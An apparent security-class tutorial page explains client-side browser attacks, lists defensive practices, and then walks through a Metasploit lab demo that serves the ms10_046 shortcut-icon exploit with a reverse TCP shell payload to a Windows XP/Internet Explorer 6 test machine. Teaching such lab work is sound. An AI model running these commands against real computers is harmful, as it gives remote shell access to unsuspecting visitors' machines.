Client Side Exploits using Metasploit

{loadposition adposition4}

Overview

Client side exploits are an extremely common form of attack. A typical scenario is an attacker compromises an ecommerce website and then use that website as a proxy to launch attacks on unsuspecting website visitors. {loadposition adposition5}How many of us have received viruses from a malicious webpage and website? More often than not, the owner of the website does not know that the website contains malicious code that is attacking its visitors. In these scenarios the target of the exploit is the user’s web browser.

The role of the web browser has expanded with the role of the web. Web browsers today are required to do much more than present static text and images, web browsers process ecommerce transactions, interact with databases, launch media players, and transfer files. As such, the web and the web browser, was not designed with security in mind. What this means is that the web browser is an opportune target to focus attacks. 

Client-side Defense

So how do you protect yourself and your browser from a client-side attack? Here is a list of best practices to protect against client side attacks:

  • update and run an antivirus program and antispyware program, 
  • update your operating system and web browsers on a regular basis,
  • update media players (eg. Flash, Quicktime), readers (eg. Acrobat), and add-ons regularly
  • update Java
  • do not visit nefarious websites (eg. sites that deal with pirated music and warez)
  • Do not surf the web as an administrator, by making sure to have User Account Control (UAC) enabled in Vista or Windows 7. Windows XP users can use the program Drop My Rights to achieve the same result: click here to learn more

{loadposition adposition6}Client-side Attack

In the video tutorial below, a client-side exploit is tested against a lab computer running Windows XP Pro and Internet Explorer 6. In order to facilitate the attack, I use Metasploit to launch a webserver and serve a malicious webpage to the visiting IE6 web browser.

Demo steps:

Launch msfconsole, load the exploit and payload, set the options and launch the exploiting webserver and webpage. see the following commands:
1. #msfconsole
2. msf > search browser
3. msf > use windows/browser/ms10_046_shortcut_icon_dllloader
4. msf > show payloads
5. msf > set payload generic/shell_reverse_tcp
6. msf > show options
7. msf > set lhost  <your ip address>
8. msf > set srvhost <your ip address>
9. msf > set srvport 80
10. msf > exploit
11. On your test client (victim computer) browse to your Metasploit server’s IP address using Internet Explorer to launch the client side attack.
12. Once the exploit has finished launching list your sessions:
     msf > sessions -l
13. msf > sessions -i 1
14. you should now have a Windows shell to interact with

{loadposition adposition9}

 

Video Tutorial

 

{loadposition adposition8}

 

Author: Dan

Dan teaches computer networking and security classes at Central Oregon Community College.

Leave a Reply

Your email address will not be published. Required fields are marked *